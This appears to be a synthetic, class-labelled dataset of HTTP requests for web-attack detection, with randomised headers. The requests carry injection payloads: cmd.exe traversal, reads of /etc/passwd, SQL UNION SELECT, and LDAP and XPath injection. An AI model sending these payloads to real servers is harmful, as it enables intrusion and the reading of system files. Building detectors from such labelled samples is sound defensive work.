Start - Id: 36447
class: OsCommanding
GET /msadc/..���../..���../..���../winnt/system32/cmd.exe?/c+ HTTP/1.0
Host: 94.234.161.92
Connection: keep-alive
Accept: */*
Accept-Charset: cp-950, iso-2022-kr, windows-1258;q=0.9, iso-8859-6, iso-10646-ucs-2;q=0.8
Accept-Encoding: gzip;q=0.0, identity, identity
Accept-Language: eg-lsb4m, etnaet-terfun6w
Cache-Control: no-cache
Client-ip: 144.216.33.215
Cookie: plnihGa3d=4%[ey
Cookie2: $Version="1"
Date: Mon, 13 Aug 07 02:37:58 UTC
ETag: W/"QcQUC6TnA4cSdTY9asB"
Expect: ajatsei7=hn7Hs
From: ghijiO@Fsrajafric.com
If-Modified-Since: Sun, 04 Jan 09 18:51:01 CET
If-Unmodified-Since: Sat, 02 Sep 06 04:34:26 UTC
If-Match: "YrTK_IhAwjNM-PDjj"
If-None-Match: "WMQSazlu06TWlpGTgg"
If-Range: Tue, 08 May 07 18:49:49 UTC
Max-Forwards: 300
MIME-Version: 8.0
Pragma: no-cache
Proxy-Authorization: NTLM RWVsZ1R0YXFwdGRyaDNhaWFpaVFnaWhtc0VwMm5vYTFsZ2FpZWNheXB0c2c=
Authorization: Digest qop=auth-int
Range: 336-,5495-71936
Referer: /qa4lds/unOncTtt/nuco/ewmn.cfm
TE: deflate,trailers,chunked;q=0.8
Trailer: Transfer-Encoding
User-Agent: Mozilla/8.3 (Windows; U; Win 9x 2.8; ei-dr; rv:7.9.7) Gecko/80654155
UA-CPU: PowerPC
UA-Disp: 5073,578,16
UA-Color: color32
UA-Pixels: 006x6469
Via: FTP/6.0 109.251.5.132, FTP/1.9 124.107.204.229
Transfer-Encoding: gzip
Warning: 176 3.53.123.242 "nltteLtvtattssrC" 
X-Forwarded-For: 92.128.39.126
----: ---------------------------

null

End - Id: 36447
Start - Id: 43121
class: OsCommanding
GET /tpJpkVlk9DDICaANm/Wy6nph-fgl/yREVrO5@d1/caeTan4crxOlWE/t6tk9-wo/U8widS.aspx?dtnng=pEsw&tyoExc=%250a+++cat++%250a++++%2Fetc%2Fpasswd+++++%250a HTTP/1.0
Host: www.w6hloi72kl.biz
Connection: close
Accept: image/*;q=0.7, video/*;q=0.0, audio/*
Accept-Charset: windows-1250
Accept-Encoding: 
Accept-Language: aEapstc-sDehhe, ACy-tewtala;q=0.7, Is-et;q=0.6, ohi-tai2lim;q=0.0
Cache-Control: max-age=740
Client-ip: 147.97.228.238
Cookie: vraaSg=yac;3s1Qtfrom_7=54849
Cookie2: $Version="25"
Date: Fri, 11 Jun 04 24:28:27 UTC
ETag: "C-hPZ3ueFN8_yN2Vv"
Expect: spfinn
From: ydaj1@ewfas0rh.de
If-Modified-Since: Thu, 04 Feb 10 19:34:00 UTC
If-Unmodified-Since: Tue, 27 Apr 10 10:53:09 CET
If-Match: "3dNO5YgDRuatuL8yL"
If-None-Match: "kdmInhjGX8@PH0Zx1S"
If-Range: *
Max-Forwards: 182
MIME-Version: 9.7
Pragma: 780ww1l=asnrgA
Proxy-Authorization: NTLM U3RsZWhhcHRlVGE4bG9zYWVocnNYYWFhc3lsajd0ZVV0aDhsbm9ocmFpYQ==
Authorization: Digest cnonce="sodp"
Range: 94856-,22-022
Referer: http://www.sogrtsro.de/aeRhiQs/SobeEye.rar
TE: gzip;q=0.9,trailers,trailers
Trailer: Host
User-Agent: Mozilla/2.6 (X11; U; Linux i386 3.2; Ak-ai; rv:7.4.4) Gecko/26060633
UA-CPU: Sparc
UA-Disp: 046,4473,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 603x2268
Via: 4.7 www.Tr5eywnt.jpeg
Transfer-Encoding: gzip
Upgrade: gst/8.6
Warning: 169 190.90.41.27 "mteulHh6dilaof" 
X-Forwarded-For: 204.73.145.24
X-Serial-Number: 231798615796568
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43121
Start - Id: 37747
class: LdapInjection
GET /OTh@e_.4yB.pl?o_iIQFKBlink_=tuquoisoneuzyi&CeiiTa=hheid%29%28%26%28objectClass+++%3Dmi*%29 HTTP/1.0
Host: 177.14.12.105
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-2, x-mac-chinesetrad;q=0.2, cp-932, windows-1255;q=0.6
Accept-Encoding: *;q=0.8
Accept-Language: *
Cache-Control: no-store
Client-ip: 214.57.144.226
Cookie: fhijkeolg=o rom;rintirnn=1;ch9tlleectyue=anrpp
Cookie2: $Version="98"
Date: Wed, 30 Jan 08 15:44:02 CET
ETag: W/"6L-X_u4z8Jt7prV8D"
Expect: 100-continue
From: ft5sbsfs@ttt1ze.uk
If-Modified-Since: Sun, 11 Nov 07 21:24:13 UTC
If-Unmodified-Since: Wed, 11 Feb 04 18:23:55 UTC
If-Match: *
If-None-Match: "LxGAl68DV4gusbfD_vE"
If-Range: *
Max-Forwards: 147
MIME-Version: 0.5
Pragma: no-cache
Authorization: NTLM dW1jdWFvZTVpeDN0bml0aUR1dHJ1bmRTaUl0dGxoZW9hcnJzMmd1cHJlbTVzZHA=
Range: 87-4317
Referer: /oeaeaN/rMaIsn.php4
Trailer: Proxy-Authorization
User-Agent: hmcifrnrth
UA-CPU: MIPS
UA-Disp: 907,560,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 842x443
Via: 6.2 76.136.109.186
Transfer-Encoding: eahW
Upgrade: esS/4.5, qssn/5.3, wig/2.0
Warning: 397 www.estmthgu.jpeg "iqcdxmusey4i3" 
X-Forwarded-For: 33.253.224.201
X-Serial-Number: 3350612
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37747
Start - Id: 49588
class: XPathInjection
GET /WcNxsQ_netcat/qcdqtZwN6OGQ2NA5p55/aHiaJzU8KRNo-oS0R/ttrieriytederi/nit1liAaN0Atmfon1.jpg?usao0tnelniien=70+++or+1%3C+rlvr5h%2F9a0nt%2Fo%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D874%5D++++or++6%3D%27%5D+%7C+%2F*+%7C+%2Ffoo%5Bbar%3D%27&tEceaehfnF=n7ashih HTTP/1.1
Host: www.gaRl0upiaC.gov
Connection: rein
Accept: text/*
Accept-Charset: *;q=0.2
Accept-Encoding: compress;q=0.5, gzip
Accept-Language: sm-ohI5rr, feiousdg-qvI;q=0.7
Cache-Control: guV4='ast'
Client-ip: 173.161.30.244
Cookie: a3xeh=ttfroms?Na:ijp/;REetp=uia;hch56=19324202;C9openpspfbMESc=iesr7hypnaunionrexecu;u@PEmRlG2Za=262
Cookie2: $Version="81"
Date: Sat, 18 Feb 06 09:24:08 GMT
ETag: "7CDsKHrpzOxPOHeFna"
Expect: 100-continue
From: rmya@typuTon9h.uk
If-Modified-Since: Fri, 21 Sep 07 10:04:53 GMT
If-Unmodified-Since: Sat, 19 Nov 05 13:56:50 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 58
MIME-Version: 0.2
Pragma: no-cache
Proxy-Authorization: NTLM ZGRhaWJzeWVub0VzdHN0ZnRIZTBhZXNodHN6MW1ud3RiZWo3Yw==
Authorization: Basic dzljSGVpcTo3bHRl
Range: 124-314534,89-
Referer: /qriii/odticrh.mpg
TE: deflate;q=0.8,chunked;q=0.4
Trailer: Max-Forwards
User-Agent: q0pift/6.7
UA-CPU: Sparc
UA-Disp: 427,3177,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 122x540
Via: HTTP/8.1 www.25toA.js, 2.6 www.ohauEowd.shtml, oleiuS/0.0 www.4luoogaY.htm
Transfer-Encoding: identity
Upgrade: swferr/0.9, iaea/3.5, sehs/8.2
Warning: 639 196.49.192.5 "noannpLodeouf6r1" "Wed, 09 Nov 05 13:54:52 CET"
X-Forwarded-For: 192.195.46.225
X-Serial-Number: 9696710
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 49588
Start - Id: 48524
class: XPathInjection
POST /niodo/jivAxAAnetcatf0d4nHk/pfggPHTdbw/m-0vj9dlPoJCsQ-B6Qtd/ip4ntfTdflyoohinhi/Vw/qV7.php4? HTTP/1.0
Content-Length: 422
Content-Language: sl2treEt,vie
Content-Encoding: deflate
Content-Location: http://2aePmse.de/c6Oooje.swf
Content-MD5: dFluOG9kcXZveXVndWVydQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 30 Jan 06 08:22:43 UTC
Last-Modified: Sat, 11 Feb 06 16:13:28 GMT
Host: www.ednh.com
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: *;q=0.3
Accept-Language: 9czoeere-thatr8rl, sjntuy-ef;q=0.3, 3evum-s;q=0.9, lI6e2-mrtgcht4, gmrih9t-Ou2Dc
Cache-Control: min-fresh=61
Client-ip: 221.85.134.126
Cookie: lwer7kot=triperlefoeecy2rmzlrn
Cookie2: $Version="5"
Date: Sat, 20 May 06 03:51:40 CET
ETag: W/"DH_rMCDx8@tWH@v-"
Expect: 100-continue
From: hpeced@ekqiej.it
If-Modified-Since: Tue, 20 Jun 06 05:22:41 CET
If-Unmodified-Since: Thu, 14 Apr 05 11:42:10 UTC
If-Match: *
If-None-Match: "maUElsYH51PTTjJhGFUz"
If-Range: Sun, 03 Jun 07 13:56:17 CET
Max-Forwards: 5248
MIME-Version: 9.6
Pragma: no-cache
Proxy-Authorization: mtlwdi eSfIe=ftEqwcOT
Authorization: NTLM bWFiZHMxMXJqaW80Znlpd2Zyc2VJc3l0eGV0MDYwbW5weQ==
Range: -97671,976035-235370,9-723
Referer: /eflle/kitr/zgdGc/bleuuq/cemao.jpeg
TE: deflate,trailers,trailers
Trailer: Max-Forwards
User-Agent: Mozilla/8.6 (compatible; Konqueror/4.8; Win98; NalAdUdo)
UA-CPU: x86
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 7707x473
Via: 7.5 240.124.8.2, FTP/9.9 73.20.79.9, 0.9 97.17.163.222
Transfer-Encoding: gzip
Warning: 957 253.110.11.25 "hCgutc3eu9" 
X-Forwarded-For: 104.189.251.216
X-Serial-Number: 7572286452988
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

oo6npo=w c:w0t6wayonhsifda2&notieaons=Nxtermnodenshobot$l;6n&eauaAfleuoE=oicrmsr&AOyd=uhtaH6rjltuim&mjaasb9tur=naftpth5r\ptpama\pwpi&20ypc=ufK0yoFRf&ysr2n=Hmala7'   or   count( path/child::node()[position(   )=((  i   +   j    +   k   +   l+   1)]  | path/child::*()[position()=(k+1)])=1  or   'p0o'='    tynTe' or&yehatHoht=etCcToj

End - Id: 48524
Start - Id: 37983
class: LdapInjection
GET /nuoy2in67t4ne.jpg?2rdssdReli=rsiTrt&i@9wwuimg7c=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&stde9=1&yd4enrp=iwha&yhr6ia23=elr0antslnasreplacetj&eouk4rhtm=l6Zv_amaST&reTeolchneiheii=nwkzezIqn&fn=thitCIqTf HTTP/1.0
Host: www.ti0edavLbi.net
Connection: close
Accept: audio/*;q=0.1, audio/x-wav;q=0.8
Accept-Charset: cp-950, x-mac-hebrew;q=0.1, iso-8859-8;q=0.5
Accept-Encoding: deflate, compress, identity
Accept-Language: a-bEAzrrh, onof-2i, phoA3yau-mrolei, xn6E-t, hrfat-haP
Cache-Control: max-age=8032
Client-ip: 4.162.83.225
Cookie: iwlrn=?hAri;tDmmua8gxm=fEea
Cookie2: $Version="556"
Date: Sun, 21 Mar 10 18:38:02 GMT
ETag: W/"f@fO0MyLgdLSoe3VulIJ"
Expect: 100-continue
From: ismia@jutuoqaes.be
If-Modified-Since: Thu, 25 Sep 08 08:41:13 UTC
If-Unmodified-Since: Mon, 01 Feb 10 24:51:41 GMT
If-Match: "DIrgNt38o2Ti-BleRxrL"
If-None-Match: "K8K7mnWMiM.L8t4B"
If-Range: "ZxYGr-EE-ul2cKxlyV"
Max-Forwards: 5824
MIME-Version: 4.1
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: tiver fveie=lgEt8
Range: 4893-,-7197
Referer: http://oTrytedl.st/etcehn/13lyrdle.asmx
TE: trailers
Trailer: Warning
User-Agent: jn7exuamordhMetTg
UA-CPU: Sparc
UA-Disp: 472,2226,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 8848x2681
Via: 5.9 www.beiaelee.jpeg, 3.1 www.bncrx.html
Transfer-Encoding: deflate
Upgrade: ieu/6.3
Warning: 418 32.190.138.182:0897 "sohl3tsaeiaSnu5pEd1i" "Tue, 01 Jun 04 21:35:47 UTC"
X-Forwarded-For: 59.231.233.194
X-Serial-Number: 800649
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37983
Start - Id: 46208
class: PathTransversal
GET /s256j_gB43_f@vhX4ZL/e8N7MYbMKR9JiG.JaiRh/hQR2fYHMk-./nWD1o/nRs2wWgq/h6pHiiUoShbnBlLatmt/6netcatincludeYYZFUVMErm1.php3?eschniuezBakl=hai&v35r=%5Bn&npece4aegt=Al&2itb4=i%3BI3i&tehelistees=996507&Ncnerew3eisepey=%2Fetc%2Fpasswd&K_qC=sih&paes3hmi4hoPmdW=lnaooIdgdn&trSYzedtz=oiaonul+%26Et%7Eaa%3Elt&hGmochaA=uinu3ossrp&r3grtZrbgbchl=889720&nc=28734011&onhlretet=99699&tS3JfCHe=hS8 HTTP/1.1
Host: www.aeii.gov:08113
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: iso-8859-2, gb2312, x-mac-chinesesimp;q=0.4, euc-cn;q=0.4, shift_jis
Accept-Encoding: *
Accept-Language: rSdr-sevln2b, Sicw-n0;q=0.4, eo8-e5sRiMe, 2tcom-rrNcnin;q=0.6, asvfMth-tasq
Cache-Control: no-store
Client-ip: 197.240.64.76
Cookie: nSvuayEeloeiobT=4spametame9d gcoh;ktey0anaan=rxE24RapYXUO;rmsts9eai=sstt;ZEQZt=rO@0IK
Cookie2: $Version="383"
Date: Tue, 14 Oct 08 22:24:06 CET
ETag: W/"BwoAIQ_gJnkwh@ELCI"
Expect: 100-continue
From: meamrne@llueIt.be
If-Modified-Since: Tue, 29 Mar 05 09:02:56 UTC
If-Unmodified-Since: Wed, 08 Apr 09 19:57:27 UTC
If-Match: *
If-None-Match: *
If-Range: "zqUu0-3EU3ISXYcO"
Max-Forwards: 79
MIME-Version: 5.5
Pragma: i1so4=1wEytna
Proxy-Authorization: Basic YWNlaTp0dVJlYw==
Authorization: Digest algorithm=MD5-sess
Range: 684-,-674552,060-
Referer: /e1am/nhya/Oeifdie/ntseUrla.asp
TE: deflate,deflate;q=0.3
Trailer: Date
User-Agent: iZ3J5SdkYR http://www.aew2.it
UA-CPU: x86
UA-Disp: 411,052,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 9556x4656
Via: FTP/1.0 www.Iet8h9.tiff
Transfer-Encoding: reauo; w1wRcde=ltxq6e
Upgrade: peg/8.7, taas/9.0, SiHads/8.8, ne61as/9.8
Warning: 034 www.nkeyuho.html "s4csmi7rg" 
X-Forwarded-For: 249.22.33.20
X-Serial-Number: 03479803459
----: ------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 46208
Start - Id: 44435
class: OsCommanding
GET ..��...��..��..��..��../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www.2e3t.it:04
Connection: dsdrcaa
Accept: text/*;q=0.9, image/gif;q=0.9
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: rs-yce
Cache-Control: no-cache
Client-ip: 206.122.45.166
Cookie: s7Eehtacces=qnoe0dIEgro/\U;v78qeOG=0it;hcavT8pilWaqT=u$l$hotmailseusrhks;rltnrs99sloatea=xsEniw6L
Cookie2: $Version="74"
Date: Wed, 10 Mar 04 12:37:54 GMT
ETag: "2tnZ37xD4wGUw-x"
Expect: 100-continue
From: unh1Ohh@nhsboy.biz
If-Modified-Since: Fri, 20 Aug 04 18:24:18 CET
If-Unmodified-Since: Sat, 13 Oct 07 16:08:45 UTC
If-Match: *
If-None-Match: "zyrhq9-I2ZwYaJGgyNd"
If-Range: *
Max-Forwards: 0
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: Basic aWVzODp5ZWh5aQ==
Authorization: NTLM b2VvbG5zT2dlZlJBaDBRQ3RnZW9BcmZmbnlsaDZoOXRlaDRyd3Nod3NwMWk=
Range: 6-02287,72753-
Referer: http://eeeixl.be/pAn6Iu/Tthpwu.wmn
TE: deflate;q=0.1,chunked
Trailer: From
User-Agent: SdTfe3zflt/4.9.5.1
UA-CPU: Sparc
UA-Disp: 023,120,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 053x237
Via: FTP/3.9 88.149.17.219, FTP/8.8 www.7wamwAnn.png, 0.3 www.1s8n.htm
Transfer-Encoding: compress
Upgrade: Sarc/2.6, 8ei9c/3.9, zhD/9.6
Warning: 041 www.nmtu.css:96410 "tmhhadncfjtereqA" "Mon, 28 Sep 09 17:32:04 UTC"
X-Forwarded-For: 1.199.151.97
X-Serial-Number: 42253
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 44435
Start - Id: 42390
class: SqlInjection
GET /zaIEamDEunion5/isal.cfm?TIea8Tef=tnci5rere4ea&WZe5nilfmmedswt=2306134&eesrsbe=19546&Ba=EechoMemr6steAO&2nGs@=64907&snrgsodRfzeko=%27%29+++++UNION+ALL++++SELECT+++++%27amXoedced%27%2C6%2C2369%2C%27peanxbip%27%2C584+++FROM++txas+++++WHERE+++%28++++%27%27++%3D+++%27&nedliu1t2dWu=6878617&titXLn=eoln&daaiiaanAcQ=%25%2B7tu&vhomeTriPF5S=Wnnons&lsu9sexntx3=ahmphpE%26psart&gxK2tz=woNithoisrLame&d3jseS=qeIievalgi&ehYhfthnniere=spmh%3D HTTP/1.1
Host: 142.119.125.182:80
Connection: hwea
Accept: image/jpeg;q=0.4, video/*;q=0.7, text/plain;q=0.9
Accept-Charset: gb2312;q=0.5
Accept-Encoding: *
Accept-Language: se5-R5Isey, eTc-es
Cache-Control: max-age=3378
Client-ip: 173.58.91.50
Cookie: wzmexeclsX0a5l=c8ehapset
Cookie2: $Version="2"
Date: Fri, 27 Feb 09 04:28:20 CET
ETag: "6aYSx7Qj5t_MiM6u6aEP"
Expect: 100-continue
From: nU8g@Ctnnlleoe.st
If-Modified-Since: Thu, 12 Nov 09 12:32:09 GMT
If-Unmodified-Since: Tue, 24 Jun 08 13:50:13 GMT
If-Match: *
If-None-Match: *
If-Range: Thu, 03 Aug 06 01:18:18 UTC
Max-Forwards: 44
MIME-Version: 0.8
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: NTLM SW5vdWN0c2hQbnJvbmFldGFwbnBhYWszdXNhdGhvZGlnY3J5
Range: -012964
Referer: http://qgWac.biz/ned0Ofse/z9op/ewbedkf/qm7otc6.jsp
TE: trailers,deflate
Trailer: Host
User-Agent: Mozilla/8.5 (Windows; U; Windows NT 9.8; hv-ht; rv:8.4.1) Gecko/79170088
UA-CPU: StrongARM
UA-Disp: 8289,132,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 3589x325
Via: FTP/4.9 www.ossl1ece.html, HTTP/3.1 www.erqgiryn.gif, exGen/9.5 www.lePid.htm
Transfer-Encoding: deflate
Upgrade: rse/1.1, o5mn/7.6, zlr3/8.8, or7Eaa/3.4
Warning: 999 147.111.219.75 "f2re1Ss" 
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 42390
Start - Id: 48679
class: XPathInjection
POST /5szskga4/hNEyebojodht/gOQm.rhzb/_o9jqshutdownT/okynT1M/8FlOvT0B0Qh.Wqf/oeho2txll6f/paemtze1hyenoorune/n.06b09xNrME.jpeg? HTTP/1.0
Content-Length: 386
Content-Language: elreOba,i
Content-Encoding: compress
Content-Location: http://rDu29oNe.org/NtittTi/arwwea.mdb
Content-MD5: OTZ3b3JXZXNyYmVzZWFybg==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 28 Dec 09 07:54:57 UTC
Last-Modified: Sat, 02 Sep 06 13:24:33 GMT
Host: www.efom4tDq.cz:120
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: tSorpunz-Amc27w4;q=0.5, sognaa-etkyhr;q=0.1, 7Tiefz-k, ote3-a;q=0.8
Cache-Control: max-stale
Client-ip: 108.91.253.160
Cookie: oAneOtxeiNilota=sa]jtshutdownh/s2;@jbJ=objecte;eoroEsea8=location;Rauleebitihbcia=w|;9ee2wetthwje=c4lnu:E
Cookie2: $Version="20"
Date: Fri, 01 Jun 07 01:07:53 CET
ETag: "3.OeJwn1snCY3-uU"
Expect: 100-continue
From: NpAbn@exte7naon.de
If-Modified-Since: Sun, 26 Dec 04 08:16:46 GMT
If-Unmodified-Since: Thu, 01 Nov 07 09:42:44 CET
If-Match: "AljuqJHrOSpuY3uYH9j1"
If-None-Match: "c.0vDFWec0.hn2aQoR."
If-Range: Tue, 10 Jul 07 20:02:20 CET
Max-Forwards: 8010
MIME-Version: 7.8
Pragma: no-cache
Proxy-Authorization: NTLM c2FyOWF0c2FBcjZTZ3lucGFlcG4yc2VlMmFtYWF3dWprdQ==
Authorization: Basic amg4c0VuczpodGgyaW5z
Range: 12-
Referer: http://www.qhldiqa.uk/rfoi.tiff
TE: deflate;q=0.3
Trailer: Transfer-Encoding
User-Agent: 3ealugoeipshnayawi
UA-CPU: StrongARM
UA-Disp: 9891,852,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 2607x8764
Via: FTP/8.0 www.Aae63r.png
Transfer-Encoding: identity
Upgrade: Bkmi/2.1, eLo/9.3
Warning: 943 229.91.156.75 "nesehuesoC8tteHm" "Sat, 27 Dec 08 05:58:02 CET"
X-Forwarded-For: 32.231.214.148
X-Serial-Number: 9550547356245150782
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

aoFll8aj8nmnt=uqo02ley'     or     6   <  count(path/child::*) or   'snerp'   = '&fheyfrb=Janda&amhil=iga7eena9noNk7t2s&Wia7quEdeihot=644290&hripe0umiarojz=aectdare&@gb0Tyform@DZ=8&aoyfnj7cetPItrG=tes&iyteoiPzieiEIc=1058778397&ye=4085033&b1adrOpkeiw=in1alap:   es&likeucgb=h@F&lsmwcutWttu2e=rAfuePaimoe3whw&stezmse2hnoh1=1r+x&7rtttmrerr=2_scm&2oleez=|divet

End - Id: 48679
Start - Id: 38747
class: LdapInjection
GET /zdaHositfAdl/eqehoeh15Tdsypse/Lp/ltP4d/3aeiN/hnFaneb.sh?aierhtiwoSncr=oc&faztzy=soeh&daiKtdmsnoh=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&geag2o3yar=taefpasswdot+nis%7E4rin&onmosyostledvos=1whereyhome-&WlinkIlwinntMxFn=eOrcpcimgvgroup+byga%26%29tusock_streamwgetC&or=lisdxekRoellhs&nimdwirSnrt=isCCk6R5Wt&Uhttp5Lo=input+wy%7C HTTP/1.0
Host: www.loyrrtfiod.org
Connection: keep-alive
Accept: text/html, text/xml;q=0.9
Accept-Charset: iso-8859-6, euc-jp, x-mac-roman;q=0.1, x-mac-chinesetrad;q=0.0, x-mac-chinesesimp
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: max-age=876
Client-ip: 111.176.120.104
Cookie: s9orz8q7j2g= a;alaqRnornpt=vxi;;mbufneos2AnQlhj=16600;aSieiecizmex9i=?7de;lEtfrt5rzatas=ssystem]e;lmErbea8n34adnu=olBpvE
Cookie2: $Version="482"
Date: Sun, 31 Dec 06 05:14:34 GMT
ETag: "b2R@sMIXD.Z0eAZ@-tX"
Expect: 100-continue
From: Dddcd@u4uew8d4.be
If-Modified-Since: Mon, 08 Jun 09 17:41:22 GMT
If-Unmodified-Since: Sat, 30 Sep 06 09:38:24 CET
If-Match: "CltJQX7PfNzmwq-E6"
If-None-Match: *
If-Range: "F6F2@Ax-gf0gLSSeV"
Max-Forwards: 7797
MIME-Version: 5.3
Pragma: t='b'
Proxy-Authorization: Basic eVRzbllhY2U6aXN0bw==
Authorization: s5dai izdatts=otssshge
Range: 6-630560,55-36780
Referer: /ksEh/eonO/nfTc/Dmtdnsln/rafiutl.conf
TE: chunked,deflate,gzip
Trailer: Upgrade
User-Agent: Mozilla/9.2 (Machintosh; U; PPC Mac OS X 2.8; ho-tr; rv:9.4.4) Gecko/28259353
UA-CPU: MIPS
UA-Disp: 495,5054,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 479x813
Via: 4.8 www.sgrC3e.jpeg:4, FTP/4.2 28.222.212.146, FTP/4.4 89.157.173.61
Transfer-Encoding: gzip
Upgrade: dEii/5.0, tdxit/7.6, ieed/6.6, lZat/6.5, ogl/2.1
Warning: 623 118.59.242.63:0920 "rowFrsl" 
X-Forwarded-For: 205.210.81.15
X-Serial-Number: 91445747246733
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38747
Start - Id: 46273
class: PathTransversal
GET /eesfaiAeYati/bZQ5lNTVFUk.htm?nTatIehE5ah3Ka9=6&Azseoa=i18WYV&hutd=%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fpasswd%2500.html&abnqEoth=6nrkbttofnnribnh&a7c4=91328&yel43e=+1Ni&vEtyo=0&rn=bgsoundcxp_rOoecnsd HTTP/1.0
Host: www.rhNfine.cz:80
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: deflate, gzip;q=0.0
Accept-Language: *;q=0.6
Cache-Control: no-cache
Client-ip: 224.10.85.108
Cookie: aa35awmAuf1hpsi=lTeiif6+e;ttirm=wbiuetlocationEtty ;yeeeao3tkhgio=g5qz;jsddctn=e%r5t%ciaE2fHt>ohu>u
Cookie2: $Version="42"
Date: Mon, 01 Sep 08 23:25:05 GMT
ETag: W/"ncRxkAAYaRvA9W@k5Rm"
Expect: 100-continue
From: o8nret@EbsFqo4s.st
If-Modified-Since: Fri, 08 Oct 04 16:47:00 CET
If-Unmodified-Since: Thu, 05 Aug 04 11:55:45 CET
If-Match: *
If-None-Match: "54kfeWJLFiYYWtUP2f"
If-Range: *
Max-Forwards: 0
MIME-Version: 8.9
Pragma: Ihr6Rfcs='h'
Proxy-Authorization: NTLM dHRqZWRFSzNkcmF0Y2ltNXR0YW10ZzhmbHpuNWRuZGFJc2hlaQ==
Authorization: Basic ZW5uaWV6eGM6YW9oMG5reA==
Range: -99,17-4389
Referer: /zpL7A/reny0t/ieEr7/tLihea.jpeg
TE: trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/2.3 (X11; U; SunOS sun4u 5.6; la-Fa; rv:6.3.9) Gecko/22481660
UA-CPU: PowerPC
UA-Disp: 542,0115,16
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 1380x824
Via: 7.5 www.7Nfi.js
Transfer-Encoding: gzip
Upgrade: Su9qj/8.6, baec/7.2
Warning: 013 22.194.211.11 "8iCne9m5iQhhsaHen19e" 
X-Forwarded-For: 194.255.26.137
X-Serial-Number: 1060683
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46273
Start - Id: 44900
class: PathTransversal
GET /1lF/lxSU6ibree/enieeueAai8ee0ivwse/seFUv/eo/c6c/N8update8e9KnN0jA/etlyraeitI/ifkOil.htm?nenzaMiRe9=dr%28&g3tht5ayrae=29&rneliu7bou1Ao=r%24eiahoaEoH1d%24%2Fr&ldImate2eatuutp=iimguCh&inettntasau=67985133&ed7sa7inlj=0706870&ellmtgnes76o=4303792944&fhsatsrcnHaur=collection%28+file%3A%2F%2F%2Fc%3A%2Fisfl%2FeuYdnts.xml++%29&rht=27380 HTTP/1.1
Host: www.tgsn6s.ch:75303
Connection: keep-alive
Accept: text/*;q=0.3
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 139.102.255.156
Cookie: tipfldua7sit==re[>isOuTy>epuF;ltTirtphrpwhb=msuqTohftu
Cookie2: $Version="65"
Date: Tue, 17 Jul 07 23:11:59 GMT
ETag: "4HBE8n8.L-wVqUCHLJ8L"
Expect: s0deb=TEis;b9a59a
From: ossdo1d@eovryuBei.be
If-Modified-Since: Mon, 28 Jan 08 18:14:27 GMT
If-Unmodified-Since: Sat, 16 Oct 04 03:34:08 CET
If-Match: *
If-None-Match: *
If-Range: Sun, 14 Aug 05 10:58:10 UTC
Max-Forwards: 368
MIME-Version: 1.8
Pragma: no-cache
Proxy-Authorization: Digest opaque="nwijehr"
Authorization: Digest realm
Range: 78821-,-584,26-7
Referer: http://ji7iuo.fr/uele/tzjchjt/t6og/ieqmud/mTmnrtd.gz
TE: deflate,deflate,chunked;q=0.1
Trailer: Transfer-Encoding
User-Agent: ssttercotl/0.9.2.6.4
UA-CPU: StrongARM
UA-Disp: 7572,678,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 6797x3315
Via: HTTP/4.3 116.247.21.28, Enh/6.9 21.51.91.144, 7.1 111.79.44.35:3302
Transfer-Encoding: gzip
Upgrade: bSv/3.5, tpb/0.4, sbReuF/5.2, taf/0.6, 3ghel/8.4
Warning: 647 www.4rtd.shtml "hrxe" "Sat, 11 Oct 08 22:03:34 GMT"
X-Forwarded-For: 74.214.158.51
X-Serial-Number: 055847
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

